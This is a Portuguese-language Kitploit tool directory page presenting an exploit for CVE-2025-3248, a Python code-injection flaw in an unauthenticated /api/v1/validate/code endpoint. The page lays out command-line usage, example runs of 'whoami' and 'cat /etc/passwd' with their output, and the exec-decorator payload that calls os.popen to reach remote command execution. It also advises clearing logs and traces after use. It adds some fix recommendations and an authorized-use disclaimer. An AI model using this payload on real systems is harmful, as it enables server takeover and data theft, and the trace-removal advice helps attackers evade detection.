Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3248 — Exploit para CVE-2025-3248: injeta payloads Python elaborados em um endpoint de código de API não autenticado para executar comandos arbitrários no servidor alvo. | Kitploit
Ferramentas/GitHubGitHub/12-test-12/cve-2025-3248
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHub12-test-12/cve-2025-3248

CVE-2025-3248

Exploit para CVE-2025-3248: injeta payloads Python elaborados em um endpoint de código de API não autenticado para executar comandos arbitrários no servidor alvo.

Ver Repositório
2há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-3248 Documentação da Ferramenta de Exploração

Introdução Esta ferramenta é usada para explorar a vulnerabilidade CVE-2025-3248 (uma vulnerabilidade de injeção de código baseada em Python), construindo payloads maliciosos para obter execução remota de comandos (RCE) no servidor alvo. A vulnerabilidade existe em um endpoint de API de uma aplicação web, onde um invasor pode injetar código Python arbitrário através de um ponto de execução não validado.

Aviso importante: Esta ferramenta destina-se apenas a testes de segurança autorizados. Testes de penetração não autorizados podem violar a lei. Certifique-se de ter autorização explícita para testar o sistema alvo.

Funcionalidades ✅ Injeção de código Python malicioso através do endpoint /api/v1/validate/code ✅ Suporte para execução de comandos arbitrários do sistema (ex: whoami, ls) ✅ Tempo limite personalizável (padrão: 10 segundos) ✅ Suporte para saída em formato texto/JSON ✅ Tratamento detalhado de erros e logs

Como usar

Sintaxe básica

root@kitploit:~
python cve-2025-3248.py -t <URL_ALVO> -c "<COMANDO>" [opções]

Descrição dos parâmetros

ParâmetroObrigatórioDescrição
-t, --targetSimURL alvo (formato: http://ip:porta)
-c, --commandSimComando do sistema a executar (deve estar entre aspas)
-o, --outputNãoFormato de saída (text/json, padrão: text)
--timeoutNãoTempo limite da requisição (segundos, padrão: 10)
-v, --verboseNãoExibir logs detalhados de execução

Exemplos de uso

Exemplo 1: Executar comando whoami (formato de saída padrão)

root@kitploit:~
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"

Exemplo de saída:

root@kitploit:~
[+] Comando executado com sucesso
--------------------------------------------------
www-data
--------------------------------------------------

Exemplo 2: Saída em formato JSON + logs detalhados

root@kitploit:~
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v

Exemplo de saída:

root@kitploit:~
{
  "status": 200,
  "content": "root:x:0:0:root:/root:/bin/bash\n...",
  "success": true
}

Breve análise do princípio da vulnerabilidade

  1. O serviço alvo recebe o parâmetro code no endpoint /api/v1/validate/code
  2. O servidor não filtra a entrada e usa exec() diretamente para executar o código Python recebido
  3. O invasor constrói um payload especial:
root@kitploit:~
import os
@exec("raise Exception(os.popen('whoami').read())")
def f():
    pass
  1. Através do mecanismo de tratamento de exceção, os.popen() é acionado para executar comandos do sistema

Risco da vulnerabilidade: Esta vulnerabilidade pode levar ao controle total do servidor. O invasor pode executar comandos arbitrários do sistema, roubar dados sensíveis, implantar backdoors, etc.

Aviso de Segurança

⚠️ Esta ferramenta destina-se APENAS a testes de penetração autorizados ⚠️

  • Risco legal: Usar esta ferramenta para testes de penetração sem autorização explícita pode violar leis como o Computer Fraud and Abuse Act e outras legislações aplicáveis.
  • Risco do sistema: A execução de comandos do sistema pode causar falhas no serviço, perda de dados ou queda do sistema.
  • Risco de deteção: Atividades de ataque podem ser detectadas e registadas por firewalls, IDS/IPS.

Recomendações:

  • Utilize apenas em ambientes controlados (como laboratórios ou ambientes de teste autorizados)
  • Use o parâmetro -v para visualizar logs detalhados e evitar erros
  • Após a execução, limpe imediatamente os rastros (ex: remover logs, fechar sessões)

Ambiente de dependências

  • Python 3.7+
  • Biblioteca requests (deve ser instalada previamente)
root@kitploit:~
pip install requests

Descrição de tratamento de erros

Código de erroCausaSolução
[-] URL alvo com formato inválidoURL sem scheme ou hostVerificar formato da URL (ex: http://127.0.0.1:8080)
[-] Tempo limite da requisiçãoAlvo excedeu o tempo de respostaAumentar o valor do parâmetro --timeout
[-] Erro de conexãoAlvo inacessível / bloqueado por firewallVerificar conectividade de rede
[-] Falha na execução do comando - Código HTTP: 403Permissão negada pelo servidorConfirmar se o serviço alvo permite execução de código

Detalhes técnicos

  • Local da vulnerabilidade: Endpoint POST /api/v1/validate/code
  • Tipo de vulnerabilidade: Injeção de código (Code Injection)
  • Versões afetadas: Não especificado (o script assume uma versão vulnerável)
  • Recomendações de correção:
    • Filtrar rigorosamente a entrada (proibir funções como exec/eval)
    • Executar código fornecido pelo usuário em um ambiente isolado (sandbox)
    • Restringir o escopo de permissões do endpoint da API

Isenção de responsabilidade: Este documento destina-se exclusivamente a fins de pesquisa e educação em segurança. O autor não se responsabiliza por quaisquer danos diretos ou indiretos resultantes do uso desta ferramenta. Respeite as leis e utilize as ferramentas de segurança de forma legal.

Baixar ferramenta